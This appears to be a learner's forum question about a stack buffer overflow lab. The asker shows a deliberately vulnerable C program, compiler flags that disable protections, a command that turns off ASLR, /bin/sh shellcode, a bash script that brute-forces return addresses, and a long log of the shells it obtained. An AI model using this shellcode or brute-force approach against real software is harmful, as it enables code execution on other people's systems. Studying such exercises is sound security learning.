I wrote a simple vulnerable program to stack overflow attack:
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void func(char *arg)
{
char name[32];
strcpy(name, arg);
printf("Welcome %s\n", name);
}
int main (int argc, char *argv[])
{
if (argc != 2)
{
printf("Use: %s YOUR_NAME\n", argv[0]);
return 0;
}
func(argv[1]);
return 0;
}
I compile it with:
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack example.c -o example
and disable ASLR with
echo 0 > /proc/sys/kernel/randomize_va_space
I wrote a simple shellcode:
08048054 <_start>:
8048054: eb 1f jmp 8048075 <last>
08048056 <first>:
8048056: 90 nop
8048057: 5e pop %esi
8048058: 89 76 08 mov %esi,0x8(%esi)
804805b: 31 c0 xor %eax,%eax
804805d: 88 46 07 mov %al,0x7(%esi)
8048060: 89 46 0c mov %eax,0xc(%esi)
8048063: b0 0b mov $0xb,%al
8048065: 89 f3 mov %esi,%ebx
8048067: 8d 4e 08 lea 0x8(%esi),%ecx
804806a: 8d 56 0c lea 0xc(%esi),%edx
804806d: cd 80 int $0x80
804806f: 31 db xor %ebx,%ebx
8048071: 89 d8 mov %ebx,%eax
8048073: 40 inc %eax
8048074: cd 80 int $0x80
08048076 <last>:
8048076: e8 dc ff ff ff call 8048056 <first>
804807b: 2f das
804807c: 62 69 6e bound %ebp,0x6e(%ecx)
804807f: 2f das
8048080: 73 68 jae 80480e9 <last+0x74>
...
And I was be able to exploit it in gdb, I get a shell. But outside the gdb I can't. It is normal because as said in this SO answer Buffer overflow works in gdb but not without it gdb adds some environment variables. So, I tried the alternatives posted in the accepted solution (including the script) and it doesn't work for me.
So, I worte a shell script to test addresses near address figured out in gdb:
#!/bin/bash
max=255
for i in `seq 219 $max`
do
for j in `seq 0 $max`
do
#hex= printf "%02x" `echo "obase=16; $i" | bc`
hex=`printf "%02x" $i`
hex1=`printf "%02x" $j`
echo "probando direccion: 0xffff$hex$hex1"
shellcode="\x90\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x$hex1\x$hex\xff\xff"
./example `python -c "print '$shellcode'"`
done
done
What is my surprise? That the script I wrote get shells with differents addresses
./exploit.sh: línea 7: 14682 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6bf
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14687 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c0
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6c1
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6c2
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14703 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c3
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6c4
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14712 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c5
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14717 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c6
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14722 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c7
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14727 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c8
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14732 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6c9
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14737 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6ca
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14742 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6cb
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14747 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6cc
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14752 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6cd
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14757 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6ce
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14762 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6cf
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6d0
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14771 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6d1
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6d2
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6d3
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6d4
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14788 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6d5
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14793 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6d6
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6d7
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14803 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6d8
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14808 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6d9
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6da
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14817 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6db
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6dc
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14826 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6dd
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6de
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14835 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6df
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6e0
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
$ exit
probando direccion: 0xffffd6e1
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14849 Instrucción ilegal (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6e2
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14854 Instrucción ilegal (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6e3
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14859 Instrucción ilegal (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6e4
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14864 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
probando direccion: 0xffffd6e5
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
./exploit.sh: línea 7: 14869 Violación de segmento (`core' generado) ./example `python -c "print '$shellcode'"`
As you can see, in many different addresses (i.e 0xffffd6c0, 0xffffd6c1, 0xffffd6c3, 0xffffd6cf, 0xffffd6d1, etc..) I get a shell.
What is the reason for this?
The addresses 0xffffd6c0, 0xffffd6c1 (first two) and 0xffffd6e0 (last address that I get a shell) can have sense because the first address in my shellcode is a nop and the true shellcode start at start+1 (this explain the first 2 shell that I get). The shell gets with the 0xffffd6e0 address makes sense because that address is the address of the call:
8048075: e8 dc ff ff ff call 8048056 <first>
But why the other shells that I get?
In addition if I execute the vulnerable program with the address that my shell script gets shells I obtain segmentation faults
user:~/Documents/exploiting ./example `python -c "print '\x90\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xc0\xd6\xff\xff'"`
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
[1] 21580 segmentation fault (core dumped) ./example
user:~/Documents/exploiting ./example `python -c "print '\x90\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xc1\xd6\xff\xff'"`
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
[1] 21584 segmentation fault (core dumped) ./example
user:~/Documents/exploiting ./example `python -c "print '\x90\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xe0\xd6\xff\xff'"`
Welcome ��^�1��F�F
�
����V
1ۉ�@�����/bin/sh����
[1] 21588 segmentation fault (core dumped) ./example
Is the same behavior that I get in gdb, shellscript also modified the stack addresses of program executes from them?
